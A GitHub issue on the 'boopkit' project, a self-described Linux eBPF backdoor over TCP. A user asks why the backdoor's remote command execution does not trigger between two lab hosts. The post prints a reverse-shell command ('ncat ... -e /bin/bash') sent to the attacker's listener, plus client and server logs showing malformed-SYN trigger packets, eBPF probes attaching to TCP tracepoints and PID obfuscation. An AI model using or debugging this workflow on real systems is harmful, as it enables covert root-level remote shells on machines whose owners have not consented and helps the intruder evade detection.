search

krisnova / boopkit

Linux eBPF backdoor over TCP. Spawn reverse shells, RCE, on prior privileged access. Less Honkin, More Tonkin.
Apache License 2.0
1.55k stars 168 forks source link

Little confused about server and client connections- Hope to get answer #21

Open antonbek89 opened 1 month ago

antonbek89 commented 1 month ago

So I already compile Boopkit In the server side ip 10.10.10.10 I run the binary boopkit

In the client ip 10.10.10.8 i run the boopscript after i change the RHOST and the LHOST

RHOST = 10.10.10.10 LHOST = 10.10.10.8

The ports 22,3535,3545 open (inbound) from both side

When I try run it from the client 


  -> *[RCE]     : ncat 10.10.10.8 3545 -e /bin/bash &
  -> *[Local]   : 10.10.10.8:3535
  -> *[Remote]  : 10.10.10.10:22
================================================================
  -> [112 bytes]   TX SYN     : 10.10.10.10 (SOCK_RAW, RCE, *bad csum)
  -> [handshake]   CONN       : 10.10.10.10:22
  -> [060 bytes]   TX SYN     : 10.10.10.10:22
  <- [048 bytes]   RX SYN-ACK : 10.10.10.10:22 (RCE)
  -> [060 bytes]   TX ACK-RST : 10.10.10.10:22
  -> [hanging..]   CONN       : 10.10.10.8:3535 (listen...)

From server side

================================================================
  -> getuid()                : 0
  -> getpid()                : 1246
  -> getppid()               : 1064
  -> Logs                    : /sys/kernel/tracing/trace_pipe
  -> Loading eBPF Probe      : /root/.boopkit/pr0be.safe.o
  -> Starting xCap Interface : lo
  -> Initalizing Ring Buffer
  ->   eBPF Probe Loaded     : /root/.boopkit/pr0be.safe.o
  -> Loading eBPF Probe      : /root/.boopkit/pr0be.boop.o
  ->   eBPF Probe Loaded     : /root/.boopkit/pr0be.boop.o
  ->   eBPF Program Attached : tp/tcp/tcp_bad_csum
  ->   eBPF Program Attached : tp/tcp/tcp_receive_reset
  ->   eBPF   Map Name       : event
  -> Obfuscating PID         : 1246
  -> xCap RingBuffer Started : lo
================================================================
  ** Boop source: 10.10.10.8
  -> Search xCap Ring Buffer: 10.10.10.8
  -> Initalizing Ring Buffer
  -> Taking snapshot of network traffic.
  -> No RCE in xCap!
  -> Free Ring Buffer
  ** Boop source: 10.10.10.10
  -> Search xCap Ring Buffer: 10.10.10.10
  -> Initalizing Ring Buffer
  -> Taking snapshot of network traffic.
  -> No RCE in xCap!
  -> Free Ring Buffer
  ** Boop source: 10.10.10.10
  -> Search xCap Ring Buffer: 10.10.10.10
  -> Initalizing Ring Buffer
  -> Taking snapshot of network traffic.
  -> No RCE in xCap!
  -> Free Ring Buffer
  ** Boop source: 10.10.10.10
  -> Search xCap Ring Buffer: 10.10.10.10
  -> Initalizing Ring Buffer
  -> Taking snapshot of network traffic.
  -> No RCE in xCap!
  -> Free Ring Buffer

What I doing wrong?